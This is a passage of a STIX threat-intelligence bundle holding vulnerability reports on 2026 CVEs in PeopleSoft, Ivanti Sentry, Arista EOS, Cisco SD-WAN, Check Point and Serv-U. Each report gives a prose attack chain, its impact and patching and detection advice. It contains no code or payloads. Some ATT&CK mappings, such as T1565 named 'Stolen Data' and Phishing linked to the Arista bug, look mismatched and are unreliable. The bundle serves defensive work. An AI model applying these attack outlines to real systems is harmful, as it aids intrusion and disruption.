      "description": "## Overview\n\nCVE-2026-35273 is a critical vulnerability affecting Oracle PeopleSoft Enterprise PeopleTools, identified as a missing authentication for a critical function. This flaw allows an unauthenticated attacker to bypass security controls and gain complete control over affected PeopleSoft systems. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added this CVE to its Known Exploited Vulnerabilities Catalog, highlighting active exploitation in the wild, specifically noting its use in ransomware campaigns. Organizations utilizing PeopleSoft Enterprise PeopleTools are at severe risk of compromise, including data theft, system disruption, and ransomware deployment. This vulnerability impacts the core security of PeopleSoft installations, making immediate patching and mitigation crucial to prevent catastrophic business impact.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies an internet-facing Oracle PeopleSoft Enterprise PeopleTools instance.\n2.  The attacker crafts and sends a specially designed HTTP request targeting a critical function endpoint within the PeopleSoft application.\n3.  Due to the missing authentication vulnerability (CVE-2026-35273), the PeopleSoft application processes the attacker's request without validating user credentials or session tokens.\n4.  The critical function, now accessible without authorization, is invoked by the attacker to perform privileged actions, such as modifying system configurations or creating new administrative users.\n5.  Through these privileged actions, the attacker establishes persistent access or executes arbitrary code on the underlying PeopleSoft application server.\n6.  The attacker escalates privileges and deploys malicious payloads, including ransomware, or exfiltrates sensitive data from the compromised system.\n7.  Full takeover of the PeopleSoft Enterprise PeopleTools instance is achieved, leading to system disruption and data encryption for impact.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-35273 leads to complete takeover of the affected PeopleSoft Enterprise PeopleTools instance. Given the critical nature of PeopleSoft systems in managing HR, finance, and other enterprise resources, this can result in widespread business disruption, data compromise (including sensitive employee or financial records), and significant financial losses due to ransomware demands or recovery costs. The CISA advisory explicitly notes its use in ransomware campaigns, indicating that organizations failing to patch are at direct risk of severe operational impact and data destruction.\n\n## Recommendation\n\n*   Immediately apply the security patches provided by Oracle for CVE-2026-35273 on all affected PeopleSoft Enterprise PeopleTools instances, in accordance with the vendor's security alert: `https://www.oracle.com/security-alerts/alert-cve-2026-35273.html`.\n*   Deploy the provided Sigma rules (`Detects CVE-2026-35273 Exploitation — Unauthenticated Access to PeopleSoft Admin URIs`, `Detects CVE-2026-35273 Exploitation — PeopleSoft Server Suspicious Process Creation`, `Detects CVE-2026-35273 Exploitation — PeopleSoft Server Suspicious Outbound Connections`) to your SIEM and tune for your environment to detect exploitation attempts and post-exploitation activity.\n*   Enable comprehensive logging for web servers hosting PeopleSoft applications (`logsource` category: `webserver`) to capture detailed HTTP request information (URI, method, status codes, user-agent).\n*   Ensure endpoint detection and response (EDR) solutions are deployed and properly configured on all PeopleSoft application servers to monitor for suspicious process creation (`logsource` category: `process_creation`) and network connections (`logsource` category: `network_connection`).\n*   Review CISA's BOD 26-04 guidance (`https://www.cisa.gov/news-events/directives/bod-26-04-prioritizing-security-updates-based-risk`) and \"Forensics Triage Requirements\" (`https://www.cisa.gov/news-events/directives/bod-26-04-implementation-guidance-prioritizing-security-updates-based-risk`) for prioritizing and responding to this critical vulnerability.\n",
      "published": "2026-06-14T08:51:43Z",
      "labels": [
        "cve",
        "vulnerability",
        "peoplesoft",
        "oracle",
        "ransomware",
        "initial-access",
        "critical-vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--4c3e7380-a536-599a-8a1e-e402b95df8d6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-35273"
        },
        {
          "source_name": "reference",
          "url": "https://www.oracle.com/security-alerts/alert-cve-2026-35273.html"
        },
        {
          "source_name": "reference",
          "url": "https://support.oracle.com/signin/"
        },
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/directives/bod-26-04-prioritizing-security-updates-based-risk"
        },
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/directives/bod-26-04-implementation-guidance-prioritizing-security-updates-based-risk"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35273"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c2d89c38-92f4-5bb0-8687-469fae9260b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4e472938-1546-58d4-9dbd-45919ab640e5",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--55931dfb-ce6e-500d-966f-ae40321f5a1a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4e472938-1546-58d4-9dbd-45919ab640e5",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4e472938-1546-58d4-9dbd-45919ab640e5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-10520: Ivanti Sentry OS Command Injection Leading to Root RCE",
      "description": "## Overview\n\nCVE-2026-10520 is a critical OS command injection vulnerability impacting Ivanti Sentry, previously known as MobileIron Sentry. This flaw allows a remote, unauthenticated attacker to execute arbitrary operating system commands with root privileges on vulnerable appliances. Exploitation is possible when the Sentry appliance is in an unmanaged state and its endpoints are externally reachable. The presence of this vulnerability in an internet-facing appliance enables initial access and potentially full compromise of the affected system without requiring any authentication. Organizations utilizing Ivanti Sentry should immediately address this vulnerability to prevent attackers from gaining unauthorized control, exfiltrating data, or using the appliance as a pivot point for further network compromise.\n\n## Attack Chain\n\n1.  **Initial Access**: A remote, unauthenticated attacker sends a specially crafted HTTP request to an internet-exposed Ivanti Sentry appliance, targeting a vulnerable endpoint.\n2.  **Command Injection**: The crafted request includes OS command injection payloads within specific parameters (e.g., URI, headers, body) that the Sentry appliance processes without proper sanitization.\n3.  **Root Code Execution**: The vulnerable Sentry component executes the injected commands directly on the underlying operating system with root privileges, bypassing authentication and authorization mechanisms.\n4.  **System Compromise**: The attacker utilizes the root-level access to gain full control over the Ivanti Sentry appliance, including modifying system configurations, installing backdoors, or creating new privileged user accounts.\n5.  **Persistence Establishment**: Malicious scripts or binaries are deployed on the Sentry appliance to maintain access, even after reboots or attempts to mitigate the initial compromise.\n6.  **Lateral Movement/Data Exfiltration**: With persistent root access, the attacker can leverage the compromised Sentry appliance as a foothold to access internal networks, exfiltrate sensitive data, or launch further attacks.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-10520 results in complete compromise of the Ivanti Sentry appliance. This allows unauthenticated attackers to gain root-level remote code execution, granting them full control over the device. The consequences can include unauthorized data access and exfiltration, deployment of additional malware, use of the Sentry appliance as a pivot point into the internal network, and disruption of services. Given Ivanti Sentry's role in managing mobile devices and securing access, a compromise could expose a significant attack surface, potentially impacting managed devices or sensitive organizational data.\n\n## Recommendation\n\n*   Patch CVE-2026-10520 on all Ivanti Sentry appliances immediately in accordance with vendor instructions.\n*   Implement mTLS with EPMM or restricted HTTPS access through Neurons for MDM as described in the Ivanti Security Advisory to restrict external access to Sentry interfaces.\n*   Deploy the Sigma rules provided in this brief to your SIEM to detect command injection attempts against webserver logs.\n*   Monitor webserver logs for patterns indicative of OS command injection, such as shell metacharacters or common Linux command keywords.\n",
      "published": "2026-06-14T08:52:31Z",
      "labels": [
        "os-command-injection",
        "rce",
        "ivanti",
        "network-appliance",
        "critical-vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-10520"
        },
        {
          "source_name": "reference",
          "url": "https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US"
        },
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/directives/bod-26-04-prioritizing-security-updates-based-risk"
        },
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/directives/bod-26-04-implementation-guidance-prioritizing-security-updates-based-risk"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-10520"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a56a1b70-285c-5702-87c4-9e4835ba80f5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f3dfdd1e-9886-56a4-9672-5e2ad122f451",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dd01d792-bfce-5b31-b7ef-8706b3697ce2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f3dfdd1e-9886-56a4-9672-5e2ad122f451",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Stolen Data",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fb6c72ae-ec93-52e6-aee4-f505a1556242",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f3dfdd1e-9886-56a4-9672-5e2ad122f451",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f3dfdd1e-9886-56a4-9672-5e2ad122f451",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-7473: Arista EOS Incomplete Comparison Vulnerability Leading to Incorrect Packet Forwarding",
      "description": "## Overview\n\nArista Extensible Operating System (EOS) is affected by CVE-2026-7473, a critical incomplete comparison with missing factors vulnerability. This flaw enables a compromised or malicious actor to craft specific tunneled packets that, when directed to a vulnerable Arista EOS switch, are incorrectly decapsulated and subsequently forwarded to unintended network destinations. The vulnerability arises when the switch's configured decapsulation IP matches the destination IP of such a specially crafted, unexpected tunneled packet. This misrouting can lead to severe consequences, including network segmentation bypass, unauthorized access to internal resources, or denial of service by disrupting legitimate traffic flows. CISA has added this CVE to its Known Exploited Vulnerabilities Catalog, indicating a significant risk and recommending immediate mitigation.\n\n## Attack Chain\n\n1.  **Attacker Reconnaissance:** An attacker identifies a publicly exposed Arista EOS switch configured to decapsulate tunneled traffic.\n2.  **Decapsulation IP Identification:** The attacker determines the switch's specific IP address configured for tunneled packet decapsulation, either through reconnaissance or prior knowledge.\n3.  **Malformed Packet Crafting:** The attacker creates a malformed or \"unexpected\" tunneled packet, leveraging the \"incomplete comparison\" vulnerability in Arista EOS.\n4.  **Targeted Packet Destination:** The crafted tunneled packet's destination IP is set to match the identified decapsulation IP of the vulnerable Arista EOS switch.\n5.  **Packet Transmission:** The attacker sends the specially crafted tunneled packet towards the vulnerable Arista EOS switch.\n6.  **Incorrect Decapsulation:** Due to CVE-2026-7473, the Arista EOS switch incorrectly decapsulates the unexpected tunneled packet, despite its malformed nature or unauthorized origin.\n7.  **Unauthorized Forwarding:** The switch then forwards the content of the improperly decapsulated packet according to its internal routing tables, directing it to an internal network segment or host it should not reach.\n8.  **Impact Execution:** The misforwarded traffic leads to unauthorized network access, data exfiltration, or a bypass of network security controls, achieving the attacker's objective.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-7473 can lead to significant network security breaches. The primary impact involves the bypassing of network segmentation and access controls, allowing an attacker to gain unauthorized access to internal, sensitive network segments, applications, or data that would typically be protected. This could facilitate data exfiltration, lateral movement, or the establishment of persistent access within the compromised network. Furthermore, incorrect packet forwarding can disrupt legitimate network operations, potentially leading to denial-of-service conditions or network instability. While specific victim counts are not publicly available, the inclusion in CISA's KEV catalog underscores its critical risk to organizations utilizing Arista EOS.\n\n## Recommendation\n\n*   Apply mitigations outlined in the Arista security advisory (https://www.arista.com/en/support/advisories-notices/security-advisory/24005-security-advisory-0137) immediately.\n*   Deploy the Sigma rules \"Detects CVE-2026-7473 exploitation - Anomalous Internal Network Flow After Arista EOS\" and \"Detects CVE-2026-7473 exploitation - Suspicious Tunneled Traffic Targeting Arista Decapsulation IP (Non-Legitimate Source)\" to your SIEM for detection of exploitation attempts and successful breaches.\n*   Ensure comprehensive network logging is enabled on all Arista EOS devices and adjacent firewall/network monitoring solutions to capture detailed traffic flow and decapsulation events.\n*   Review and enforce network segmentation policies to minimize the blast radius should a vulnerability like CVE-2026-7473 be exploited, as per BOD 22-01 guidance.\n",
      "published": "2026-06-14T08:53:40Z",
      "labels": [
        "vulnerability",
        "cve",
        "network-device",
        "infrastructure"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-7473"
        },
        {
          "source_name": "reference",
          "url": "https://www.arista.com/en/support/advisories-notices/security-advisory/24005-security-advisory-0137"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7473"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b41817c2-b754-581d-b561-ec787895747e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--109b80ff-7c99-5b2e-9828-35435f910425",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ca26581f-4fa2-5440-bdd2-2f07245dd470",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--109b80ff-7c99-5b2e-9828-35435f910425",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--109b80ff-7c99-5b2e-9828-35435f910425",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-20245: Cisco Catalyst SD-WAN Manager Privilege Escalation via Crafted File",
      "description": "## Overview\n\nCisco Catalyst SD-WAN Manager (formerly SD-WAN vManage) is affected by CVE-2026-20245, a critical improper encoding or escaping of output vulnerability. This flaw enables an authenticated attacker with local access to the system to achieve root-level arbitrary command execution. By supplying a specially crafted file to the SD-WAN Manager, the attacker can exploit the vulnerability to bypass security controls and gain full control over the appliance. The vulnerability's presence on the CISA Known Exploited Vulnerabilities (KEV) catalog underscores its severe risk and indicates active exploitation, making immediate patching and monitoring crucial for organizations utilizing Cisco Catalyst SD-WAN solutions.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker gains authenticated local access to the Cisco Catalyst SD-WAN Manager's web interface or command-line interface, typically through compromised credentials or other local vulnerabilities.\n2.  **Payload Crafting**: The attacker develops a malicious file (e.g., a configuration file, script, or data file) that contains embedded arbitrary commands, specifically crafted to exploit the improper encoding/escaping vulnerability.\n3.  **Malicious File Submission**: The crafted file is uploaded or provided to the Cisco Catalyst SD-WAN Manager system through an affected feature or interface that processes user-supplied files.\n4.  **Vulnerability Trigger**: When the SD-WAN Manager processes the supplied file, the improper encoding or escaping of output leads the system to misinterpret benign data as executable commands.\n5.  **Command Execution**: The embedded arbitrary commands within the crafted file are executed by the vulnerable SD-WAN Manager process on the underlying Linux operating system.\n6.  **Privilege Escalation**: The executed commands run with root privileges, granting the attacker complete control over the SD-WAN Manager appliance.\n7.  **System Compromise**: With root access, the attacker can perform actions such as modifying network configurations, exfiltrating sensitive network data, establishing persistence, or disrupting network operations managed by the SD-WAN solution.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-20245 grants an attacker root-level access to the Cisco Catalyst SD-WAN Manager. This level of access enables complete control over the network management system, potentially leading to widespread network disruption, unauthorized access to network resources, data exfiltration from the managed network, and the deployment of further malicious tools or backdoors. Compromise of an SD-WAN manager can have a cascading effect across an organization's entire wide-area network, impacting business continuity and data confidentiality.\n\n## Recommendation\n\n*   Immediately apply patches or mitigations provided by Cisco for CVE-2026-20245 as per the Cisco Security Advisory (cisco-sa-sdwan-privesc-4uxFrdzx).\n*   Deploy the Sigma rules in this brief to your SIEM and tune them for your environment, specifically focusing on `process_creation` and `file_event` logs on Cisco Catalyst SD-WAN Manager appliances.\n*   Enable comprehensive logging for `process_creation` and `file_event` on all Linux systems hosting Cisco Catalyst SD-WAN Manager to ensure the detection rules can effectively identify malicious activity.\n*   Review and implement guidance from CISA's Binding Operational Directive (BOD) 22-01 regarding known exploited vulnerabilities and cloud services.\n",
      "published": "2026-06-14T08:54:44Z",
      "labels": [
        "privilege-escalation",
        "rce",
        "network-device",
        "cisco",
        "linux"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-20245"
        },
        {
          "source_name": "reference",
          "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-privesc-4uxFrdzx"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20245"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--494e3b7c-daa4-5c9d-bb29-0e05db313ab9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--37d17094-1fbf-511f-bd75-71b735759f2e",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "External Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1133",
          "url": "https://attack.mitre.org/techniques/T1133"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f75eec3c-14c4-5ed6-8cb0-4325688b82da",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--37d17094-1fbf-511f-bd75-71b735759f2e",
      "target_ref": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--37d17094-1fbf-511f-bd75-71b735759f2e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Check Point Security Gateway IKEv1 Improper Authentication Vulnerability (CVE-2026-50751)",
      "description": "## Overview\n\nCheck Point Security Gateway is vulnerable to an improper authentication flaw, tracked as CVE-2026-50751, residing within its IKEv1 key exchange mechanism. This critical vulnerability allows an unauthenticated remote attacker to completely bypass user authentication. By exploiting this flaw, attackers can establish a remote access VPN connection to the targeted network without requiring a valid user password. The vulnerability is particularly severe as it affects a deprecated protocol, IKEv1, yet it can still be enabled on vulnerable Security Gateway devices. Its inclusion in the CISA Known Exploited Vulnerabilities (KEV) Catalog, coupled with confirmed use in ransomware campaigns, underscores the urgency for immediate mitigation to prevent unauthorized network access and subsequent malicious activities.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Vulnerability Identification:** An attacker scans for internet-facing Check Point Security Gateway devices and identifies instances with the deprecated IKEv1 protocol enabled.\n2.  **IKEv1 Key Exchange Initiation:** The attacker initiates an IKEv1 key exchange process with the vulnerable Check Point Security Gateway.\n3.  **Exploitation of Improper Authentication:** The attacker exploits the CVE-2026-50751 vulnerability during the IKEv1 key exchange phase.\n4.  **Authentication Bypass:** Due to the flaw, the Security Gateway's authentication process is bypassed, allowing the attacker to proceed without providing valid user credentials.\n5.  **Establishment of Remote Access VPN:** The attacker successfully establishes a remote access VPN connection to the internal network as an unauthenticated user.\n6.  **Internal Network Access:** With VPN access, the attacker gains a foothold in the target organization's internal network.\n7.  **Post-Exploitation Activities:** The attacker proceeds with internal network reconnaissance, lateral movement, data exfiltration, or deployment of ransomware and other malware, leveraging their unauthorized access.\n8.  **Impact:** The attacker achieves their final objective, which could include data theft, system disruption, or encryption of systems via ransomware.\n\n## Impact\n\nThe successful exploitation of CVE-2026-50751 grants an unauthenticated remote attacker full unauthorized access to an organization's internal network via a remote access VPN connection. This access can lead to severe consequences, including the exfiltration of sensitive data, deployment of ransomware (as evidenced by its known use in such campaigns), and significant disruption of business operations. Organizations in any sector using Check Point Security Gateway with IKEv1 enabled are at risk. The vulnerability's presence in the CISA KEV catalog highlights its critical nature and confirmed in-the-wild exploitation.\n\n## Recommendation\n\n*   Immediately apply hotfix sk185033 from Check Point on all affected Security Gateway devices.\n*   Disable the deprecated IKEv1 VPN protocol on all Check Point Security Gateways if not strictly required, as per Check Point's guidance in blog.checkpoint.com/security/check-point-releases-important-hotfix-for-vulnerabilities-in-deprecated-ikev1-vpn-protocol/.\n*   Deploy the Sigma rule \"Detects CVE-2026-50751 Exploitation — Check Point Successful IKEv1 VPN Connection\" to your SIEM to alert on any successful IKEv1 VPN connections, especially if this protocol should be disabled.\n*   Enable comprehensive logging for all VPN connection attempts and successes on Check Point Security Gateway devices to monitor for anomalous activity.\n*   Review VPN authentication logs for successful connections from unusual source IPs or involving unexpected user accounts, using the Sigma rule \"Detects CVE-2026-50751 - Check Point VPN Bruteforce Attempts\" as a starting point for detection.\n",
      "published": "2026-06-14T08:55:45Z",
      "labels": [
        "authentication-bypass",
        "vpn",
        "network-device",
        "cisa-kev",
        "ransomware"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-50751"
        },
        {
          "source_name": "reference",
          "url": "https://blog.checkpoint.com/security/check-point-releases-important-hotfix-for-vulnerabilities-in-deprecated-ikev1-vpn-protocol/"
        },
        {
          "source_name": "reference",
          "url": "https://support.checkpoint.com/results/sk/sk185033?_gl=1*1wqeqhc*_gcl_au*MTI1MzE5MjI2LjE3ODA5MzQ1NTM."
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50751"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0b97e746-8780-5ac7-ac32-bbf01180e9e8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--afc04815-b146-5da3-9085-7940d1c784e6",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--afc04815-b146-5da3-9085-7940d1c784e6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-28318: SolarWinds Serv-U Unauthenticated Denial-of-Service",
      "description": "## Overview\n\nCVE-2026-28318 is an uncontrolled resource consumption vulnerability affecting SolarWinds Serv-U, a popular managed file transfer (MFT) solution. This vulnerability allows an unauthenticated attacker to remotely trigger a denial-of-service (DoS) condition by sending specially crafted HTTP POST requests that contain the `Content-Encoding: deflate` header. When the vulnerable Serv-U instance attempts to process these requests, it consumes excessive resources, leading to the service crashing and becoming unavailable. The vulnerability was added to CISA's Known Exploited Vulnerabilities (KEV) catalog, indicating active exploitation in the wild or a significant risk thereof, and mandates federal agencies to apply mitigations by June 19, 2026. This threat is critical for organizations relying on Serv-U for file transfers, as its unavailability can severely disrupt business operations.\n\n## Attack Chain\n\n1.  **Reconnaissance**: An attacker identifies an internet-exposed SolarWinds Serv-U instance, often using tools like Shodan or other OSINT sources.\n2.  **Request Crafting**: The attacker crafts a malicious HTTP POST request designed to exploit the uncontrolled resource consumption vulnerability.\n3.  **Header Injection**: The crafted POST request specifically includes the `Content-Encoding: deflate` header, instructing the server to decompress the request body.\n4.  **Payload Delivery**: The attacker sends the specially crafted POST request, which may contain malformed or excessively large deflate-encoded data, to the vulnerable Serv-U web server.\n5.  **Resource Consumption**: The Serv-U service attempts to decompress and process the `deflate`-encoded content in the request, triggering uncontrolled resource consumption (e.g., CPU, memory).\n6.  **Service Crash**: Due to the vulnerability, the Serv-U process becomes unstable and eventually crashes, terminating the application.\n7.  **Denial of Service**: The SolarWinds Serv-U service becomes unavailable, preventing legitimate users from accessing or transferring files and disrupting critical business functions.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-28318 results in a complete denial-of-service for the affected SolarWinds Serv-U instance. Since Serv-U is often used for critical file transfer operations, its unavailability can lead to severe operational disruptions, data access issues, and potential financial losses for affected organizations. While the vulnerability itself does not allow for data exfiltration or remote code execution, a DoS attack can severely impact business continuity and may also be used as a distraction for other concurrent attack activities. The CISA KEV catalog listing underscores the severity and observed real-world impact of this vulnerability.\n\n## Recommendation\n\n*   Apply vendor patches for CVE-2026-28318 immediately as outlined by SolarWinds, specifically updating to Serv-U 15.5.4 Hotfix 1 or later.\n*   Deploy the provided Sigma rule \"Detect CVE-2026-28318 Exploitation - Serv-U DoS Attempt\" to your SIEM to identify attempted exploitation.\n*   Enable comprehensive web server logging for your Serv-U instances, capturing full HTTP request headers and methods, to aid in detecting and investigating exploitation attempts.\n*   Implement CISA BOD 22-01 guidance for all applicable federal agencies and consider discontinuing use if unable to apply mitigations or patches.\n",
